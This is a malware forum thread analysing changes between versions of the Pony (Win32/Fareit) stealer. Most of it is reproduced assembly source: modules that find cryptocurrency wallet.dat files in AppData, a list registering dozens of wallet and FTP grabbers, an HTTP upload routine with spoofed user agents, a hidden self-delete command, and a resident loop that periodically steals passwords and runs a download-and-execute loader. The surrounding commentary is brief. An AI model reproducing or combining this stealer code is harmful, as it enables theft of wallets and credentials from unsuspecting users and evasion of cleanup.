   invoke   AppDataCommonFileScan, stream, offset CYacoinAppDataDir, offset CYacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabYacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Zetacoin
; http://www.zeta-coin.org/
; Tested: v0.8.99.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ZETACOIN

.data
   CZetacoinWalletFile               db   'wallet.dat',0
   CZetacoinAppDataDir               db   '\Zetacoin',0

.code

GrabZetacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ZETACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CZetacoinAppDataDir, offset CZetacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabZetacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FastCoin
; http://www.fastcoin.ca/
; Tested: v0.6.3.0-gc4135e8-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FASTCOIN

.data
   CFastcoinWalletFile               db   'wallet.dat',0
   CFastcoinAppDataDir               db   '\Fastcoin',0

.code

GrabFastcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FASTCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFastcoinAppDataDir, offset CFastcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFastcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; i0coin
; http://i0coin.bitparking.com/
; Tested: 0.3.25.9-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_I0COIN

.data
   CI0coinWalletFile               db   'wallet.dat',0
   CI0coinAppDataDir               db   '\I0coin',0

.code

GrabI0coin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_I0COIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CI0coinAppDataDir, offset CI0coinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabI0coin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Tagcoin
; http://tagcoin.org/
; Tested: v1.0.2
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_TAGCOIN

.data
   CTagcoinWalletFile               db   'wallet.dat',0
   CTagcoinAppDataDir               db   '\Tagcoin',0

.code

GrabTagcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TAGCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CTagcoinAppDataDir, offset CTagcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTagcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bytecoin
; http://www.bytecoin.biz/
; Tested: v0.8.1.1-gfdc7831-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BYTECOIN

.data
   CBytecoinWalletFile               db   'wallet.dat',0
   CBytecoinAppDataDir               db   '\Bytecoin',0

.code

GrabBytecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BYTECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBytecoinAppDataDir, offset CBytecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBytecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Florincoin
; http://www.florincoin.org
; Tested: v0.6.5.8-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FLORINCOIN

.data
   CFlorincoinWalletFile               db   'wallet.dat',0
   CFlorincoinAppDataDir               db   '\Florincoin',0

.code

GrabFlorincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FLORINCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFlorincoinAppDataDir, offset CFlorincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFlorincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Phoenixcoin
; http://phoenixcoin.org/
; Tested: v0.6.5.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PHOENIXCOIN

.data
   CPhoenixcoinWalletFile               db   'wallet.dat',0
   CPhoenixcoinAppDataDir               db   '\Phoenixcoin',0

.code

GrabPhoenixcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PHOENIXCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPhoenixcoinAppDataDir, offset CPhoenixcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPhoenixcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Luckycoin
; https://cryptocointalk.com/forum/188-luckycoin-lky/
; Tested: v0.9.9.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LUCKYCOIN

.data
   CLuckycoinWalletFile               db   'wallet.dat',0
   CLuckycoinAppDataDir               db   '\Luckycoin',0

.code

GrabLuckycoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LUCKYCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CLuckycoinAppDataDir, offset CLuckycoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLuckycoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; CraftCoin
; http://craftcoin.net
; Tested: v1.1.1.2-unk-crc
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_CRAFTCOIN

.data
   CCraftcoinWalletFile               db   'wallet.dat',0
   CCraftcoinAppDataDir               db   '\Craftcoin',0

.code

GrabCraftcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_CRAFTCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CCraftcoinAppDataDir, offset CCraftcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabCraftcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; JunkCoin
; http://jkcoin.com/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_JUNKCOIN

.data
   CJunkcoinWalletFile               db   'wallet.dat',0
   CJunkcoinAppDataDir               db   '\Junkcoin',0

.code

GrabJunkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_JUNKCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CJunkcoinAppDataDir, offset CJunkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabJunkcoin endp

ENDIF

Line 13229 (code addition):
               AddModule COMPILE_MODULE_FASTTRACK, GrabFastTrack
               AddModule COMPILE_MODULE_BITCOIN, GrabBitcoin
               AddModule COMPILE_MODULE_ELECTRUM, GrabElectrum
               AddModule COMPILE_MODULE_MULTIBIT, GrabMultiBit
               AddModule COMPILE_MODULE_FTPDISK, GrabFTPDisk
               AddModule COMPILE_MODULE_LITECOIN, GrabLitecoin
               AddModule COMPILE_MODULE_NAMECOIN, GrabNamecoin
               AddModule COMPILE_MODULE_TERRACOIN, GrabTerracoin
               AddModule COMPILE_MODULE_BITCOINARMORY, GrabBitcoinArmory
               AddModule COMPILE_MODULE_PPCOIN, GrabPPCoin
               AddModule COMPILE_MODULE_PRIMECOIN, GrabPrimecoin
               AddModule COMPILE_MODULE_FEATHERCOIN, GrabFeathercoin
               AddModule COMPILE_MODULE_NOVACOIN, GrabNovaCoin
               AddModule COMPILE_MODULE_FREICOIN, GrabFreicoin
               AddModule COMPILE_MODULE_DEVCOIN, GrabDevcoin
               AddModule COMPILE_MODULE_FRANKOCOIN, GrabFrankocoin
               AddModule COMPILE_MODULE_PROTOSHARES, GrabProtoShares
               AddModule COMPILE_MODULE_MEGACOIN, GrabMegacoin
               AddModule COMPILE_MODULE_QUARKCOIN, GrabQuarkcoin
               AddModule COMPILE_MODULE_WORLDCOIN, GrabWorldcoin
               AddModule COMPILE_MODULE_INFINITECOIN, GrabInfinitecoin
               AddModule COMPILE_MODULE_IXCOIN, GrabIxcoin
               AddModule COMPILE_MODULE_ANONCOIN, GrabAnoncoin
               AddModule COMPILE_MODULE_BBQCOIN, GrabBBQcoin
               AddModule COMPILE_MODULE_DIGITALCOIN, GrabDigitalcoin
               AddModule COMPILE_MODULE_MINCOIN, GrabMincoin
               AddModule COMPILE_MODULE_GOLDCOIN, GrabGoldcoin
               AddModule COMPILE_MODULE_YACOIN, GrabYacoin
               AddModule COMPILE_MODULE_ZETACOIN, GrabZetacoin
               AddModule COMPILE_MODULE_FASTCOIN, GrabFastcoin
               AddModule COMPILE_MODULE_I0COIN, GrabI0coin
               AddModule COMPILE_MODULE_TAGCOIN, GrabTagcoin
               AddModule COMPILE_MODULE_BYTECOIN, GrabBytecoin
               AddModule COMPILE_MODULE_FLORINCOIN, GrabFlorincoin
               AddModule COMPILE_MODULE_PHOENIXCOIN, GrabPhoenixcoin
               AddModule COMPILE_MODULE_LUCKYCOIN, GrabLuckycoin
               AddModule COMPILE_MODULE_CRAFTCOIN, GrabCraftcoin
               AddModule COMPILE_MODULE_JUNKCOIN, GrabJunkcoin
               
Line 13273 (comment added):
; Collect passwords for all enabled modules
Netcode.asm:
Code: Select all
Line 126 (code remove):
char, timeout <- removed 'timeout'

Line 214 (code edition):
CDefaultUserAgent db "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",0

Line 220 (code addition):
db   "Accept-Language: en-US",13,10

line 225 (code edition):
db   "User-Agent: %s",13,10,13,10,0

Line 267 (code edition):
invoke   MemAlloc, 15000 -> invoke   MemAlloc, 32000

Line 274 (code edition):
invoke  NetRecvUntilChar, s, stream, 64000, 0ah, 30 -> invoke  NetRecvUntilChar, s, stream, 64000, 0ah

Line 390 (code edition/deletion):
.data -> .code

Line 392 (comment addition):
; do not move this block to .data, - MS FIX

Line 396 (code addition):
db   "Accept-Language: en-US",13,10

Line 400 (code edition):
db   "User-Agent: %s",13,10,13,10,0

Line 409 (Code addition):
   LOCAL   pUserAgent: DWORD
    LOCAL   cbUserAgent: DWORD

Line 422 (code addition):
    invoke   MemAlloc, 8192
    mov   pUserAgent, eax
    mov   cbUserAgent, 8192

Line 458 (instruction added):
cld

Line 477 (code edition/addition):
   invoke   ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
   test   eax, eax
   .IF   SUCCEEDED
      invoke   wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, pUserAgent
   .ELSE
      invoke   wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, offset CDefaultUserAgent
   .ENDIF

Line 511 (code addition):
   invoke   MemFree, pUserAgent
   
Line 541 (code edition):
mov   l.l_linger, 30 -> mov l.l_linger, 45

Line 546 (procedure modification):
MyUploadWithRedir proc uses edi ebx szLink, lpData, dwLen, lpOutStream, lpszRedir
    LOCAL   uc: URL_COMPONENTS   
    LOCAL   pHost: DWORD
    LOCAL   pFmt: DWORD
    LOCAL   pURL: DWORD
    LOCAL   s: DWORD
    LOCAL   len: DWORD
    LOCAL   pUserAgent: DWORD
    LOCAL   cbUserAgent: DWORD

    xor   ebx, ebx
    invoke   MemAlloc, 4096
    mov   pHost, eax

    invoke   MemAlloc, 4096
    mov   pURL, eax

    invoke   MemAlloc, 4096
    mov   pFmt, eax

    invoke   MemAlloc, 4096
    mov   pUserAgent, eax

    mov   cbUserAgent, 4096

    lea   edi, uc
    mov   ecx, sizeof URL_COMPONENTS
    xor   eax, eax
    rep stosb

    mov     uc.dwStructSize, sizeof URL_COMPONENTS

    push   pHost
    pop   uc.lpszHostName

    push   pURL
    pop   uc.lpszUrlPath

    mov     uc.dwHostNameLength, 4095
    mov   uc.dwUrlPathLength, 4095

    invoke  InternetCrackUrl, szLink, 0, ICU_ESCAPE, addr uc
    .IF   (!eax) || (uc.lpszHostName == NULL)
        jmp     @md_ret
      
Line 621 (code edition/addition):
   invoke   ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
   test   eax, eax
   .IF   SUCCEEDED
      invoke   wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, pUserAgent
   .ELSE
      invoke   wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, offset CDefaultUserAgent
   .ENDIF

Line 658 (code edition):
invoke   NetWorks, s, lpOutStream, addr lpszRedir -> invoke   NetWorks, s, lpOutStream, lpszRedir

Line 669 (code addition):
invoke   MemFree, pUserAgent

Line 671 (code addition):
   mov   eax, ebx
   ret
MyUploadWithRedir endp

MyUpload proc szLink, lpData, dwLen, lpOutStream
   LOCAL   lpszRedir: DWORD

   mov   eax, lpOutStream
   .IF   eax
      mov   dword ptr[eax], 0
   .ENDIF

   mov   lpszRedir, NULL
   invoke   MyUploadWithRedir, szLink, lpData, dwLen, lpOutStream, addr lpszRedir

Line 686 (code addition):
      invoke   MyUploadWithRedir, lpszRedir, lpData, dwLen, lpOutStream, NULL
      push   eax
      
Line 689 (code addition):
pop   eax

Line 690 (code deletion):
mov   eax, ebx
User avatar
Xylitol
Global Moderator
 
Posts: 1637
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 500

Re: Win32/Fareit

Postby Xylitol » Fri Jun 27, 2014 2:16 pm

Pony.asm:
Code: Select all
Line 35 (code addition):
includelib DLL_Loader.lib

Line 57 (code edition):
push   ebp      -> xor      edx, eax
mov      ebp, esp -> xor      eax, edx
pop      ebp      -> xor      edx, eax
   
Line 63 (code addition):
nop

Line 65 (code addition):
nop

Line 67 (code addition):
nop

Line 70 (code edition):
db   0ffh -> db   0feh

Line 75 (code deletion):
Removed the IFDEF USE_UPX

Line 80 (code addition):
IFNDEF DISABLE_GRABBER

Line 84 (code addition):
include Loader.asm

Line 110 (code addition):
nop

Line 118 (code addition):
nop

Line 119 (code edition):
push   19131011 -> push   19131012

Line 129 (code addition):
nop

Line 135 (code addition):
nop

Line 164 (code addition):
IFNDEF DISABLE_GRABBER

Line 451 (code addition):
ENDIF

Line 451 (code addition):
IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE

Line 456 (code addition/deletion):
Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
Added:
   szBatchFmt            db      '%d.bat',0
   szSelfDelQuoteFmt       db      '      "%s"   ',0
   szShellExecute         db      'ShellExecuteA',0
   szBatchFile             db      13,10,9,9,13,10,13,10,09,"   :ktk   ",13,10,13,10,13,10,"     del    ",9," %1  ",13,10,9,"if  ",9,9," exist ",9,"   %1  ",9,"  goto ",9,13," ktk",13,10," del ",9,"  %0 ",0
   szShell32Lib         db      'shell32.dll',0
   szComSpec            db      'COMSPEC', 0
   szSelfCommand         db      '%s /c del "%s" > NUL',0
   
Line 466 (code deletion/edition)
RunLoader procedure removed/replaced by:
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
   LOCAL   lpSelfFileName: DWORD
   LOCAL   lpComSpec: DWORD
   LOCAL   lpCommandBuffer: DWORD
   LOCAL   _si: STARTUPINFO
   LOCAL   _pi: PROCESS_INFORMATION
   
Line 474 (code deletion/edition):
AntiDisasmTrick replaced by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpSelfFileName, eax
   
Line 477 (code deletion/edition):
mov   edi, offset szLoaderList removed by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpComSpec, eax
   
Line 480 (code deletion/edition):
IFDEF   LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpCommandBuffer, eax
   
Line 466 (huge code addition/deletion):
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
   LOCAL   lpSelfFileName: DWORD
   LOCAL   lpComSpec: DWORD
   LOCAL   lpCommandBuffer: DWORD
   LOCAL   _si: STARTUPINFO
   LOCAL   _pi: PROCESS_INFORMATION

   invoke   MemAlloc, MAX_PATH+1
   mov   lpSelfFileName, eax

   invoke   MemAlloc, MAX_PATH+1
   mov   lpComSpec, eax

   invoke   MemAlloc, MAX_PATH+1
   mov   lpCommandBuffer, eax

   invoke   GetModuleFileName, NULL, lpSelfFileName, MAX_PATH

   invoke   GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH

   invoke   ZeroMemory, addr _si, sizeof _si
   invoke   ZeroMemory, addr _pi, sizeof _pi

   mov   _si.cb, sizeof _si
   mov   _si.dwFlags, STARTF_USESHOWWINDOW
   mov   _si.wShowWindow, SW_HIDE
      
   invoke   GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
   .IF   eax
      invoke   wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
      invoke   CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
      .IF   eax
         invoke   GetCurrentProcess
         invoke   SetPriorityClass, eax, HIGH_PRIORITY_CLASS
         invoke   SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
         invoke   SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
         invoke   ResumeThread, _pi.hThread
         inc   ebx
      .ENDIF
   .ENDIF

   invoke   MemFree, lpSelfFileName
   invoke   MemFree, lpComSpec
   invoke   MemFree, lpCommandBuffer

   mov   eax, ebx
      
   ret
SelfDeleteComSpec  endp
   
Line 526 (code addition):
   invoke   SelfDeleteComSpec
   .IF   eax
      ret
   .ENDIF
   
Line 740 (code addition):
IFNDEF DISABLE_GRABBER
   
Line 872 (code addition):
ENDIF

Line 874 (code edition):
InitApp proc -> InitApp proc lpUserToken
   
Line 887 (code edition):
invoke   ImpersonateLocalSystemUser -> invoke   ImpersonateLocalSystemUser, lpUserToken

Line 893 (comment addition):
; Get impersonated username to ignore it in brute-force procedure

Line 905 (code edition/deletion):
   IFNDEF DISABLE_GRABBER
      IFDEF ENCRYPT_REPORT
         invoke   DecodeReportPassword, offset CReportPassword
      ENDIF

Line 911 (code addition):
invoke   Randomize

Line 921 (code edition):
mov   eax, EXCEPTION_CONTINUE_SEARCH-> mov eax, EXCEPTION_CONTINUE_SEARCH

Line 926 (code addition):
   LOCAL   lpUserToken: DWORD
   LOCAL   isFirstCycleRun: DWORD
   
Line 936 (code addition/deletion):
invoke   InitApp replaced by:
   mov   lpUserToken, NULL ; impersonated user token
   invoke   InitApp, addr lpUserToken

   IFDEF   ENABLE_RESIDENT_MODE
      invoke   CopyRunFromAutoDirectory
   ENDIF

Line 945 (Code addition):
invoke   DecipherList, offset CWordList

Line 948 (deletion/edition):
invoke   ScanAndSend replaced by:
   IFNDEF DISABLE_GRABBER
      invoke   ScanAndSend
   ELSE
      invoke   MyDownloadInit
   ENDIF

Line 954 (comment edition):
; Run loader (it will attempt to download and execute files with current logged on account privileges
; when run from Windows Service [LocalSystem user], which has limited (tricked) access to HKCU path and %APPDATA%)

Line 957 (code edition):
invoke   RunLoader -> invoke   RunLoader, lpUserToken

Line 960 (Procedure addition):
   ENDIF

   ; Resident looped cycle
   mov   isFirstCycleRun, TRUE ; do not send passwords for the first cycle
   IFDEF   ENABLE_RESIDENT_MODE
      .WHILE   TRUE
         IFDEF PERIODIC_PASSWORD_SCAN
         IFNDEF   DISABLE_GRABBER
            invoke   NeedsPasswordGrabbing
            .IF   eax && !isFirstCycleRun
               ; Scan and send passwords
               invoke   ScanAndSend
            .ENDIF
         ENDIF
         ENDIF

         invoke   Sleep, RESIDENT_LOADER_TIMEOUT*60*1000

         IFDEF   ENABLE_LOADER
            invoke   RunLoader, lpUserToken
         ENDIF

         mov   isFirstCycleRun, FALSE
      .ENDW

Line 993 (code edition):
IFNDEF DISABLE_GRABBER

Line 996 (code edition):
ENDIF

Line 998: (comment addition):
; Self delete executable (works also for DLL mode - in this case parent executable will get deleted)

Line 1023 (code deletion):
After AntiDisasmTrick this part disapeared:
   .WHILE   TRUE
      invoke   GetTickCount
      mov   ecx, 10
      xor   edx, edx
      div   ecx
      .IF   edx == 5
         .BREAK
      .ENDIF
   .ENDW

Crypto.asm (no modification)
WordList.asm (no modification)
3DES stuff (no modification)
Utils.asm (code addition for the loader and some code bug-fix)
Loader.asm (new file, wasn't on the 1.9, but not really new content, they separated a part of Pony.asm to transfer it on Loader.asm, to make it more clear i think, and added some code)

As mentioned by the advert there is some huge modifications on the opera/chrome/firefox procedures, HTTP requests handling, they added also the support for WS_FTP Pro 12.4, Far Manager v3.0 build 3525 but in reality they haven't changed the code, the new versions are just 'compatible'.
For CuteFTP 9/FTP Voyager 16.1/Total Commander etc.. they just added some strings to make it compatible to the new versions.
nothing fancy about the wallet stealer code like said wacked2 but it's honorable that they improved the code, especially in asm.
Any idea on who did this work ?
User avatar
Xylitol
Global Moderator
 
Posts: 1637
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 500

Re: Win32/Fareit

Postby grum » Fri Jun 27, 2014 4:29 pm

Image
Image

++ loader real working?

<Pony>jup memory loading does work indeed, but server side is not implemented, fake only. :D
<Pony>it's missing everything except initial interface code :roll:
grum
 
Posts: 38
Joined: Tue Nov 06, 2012 12:16 pm
Reputation point: -9

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 14 guests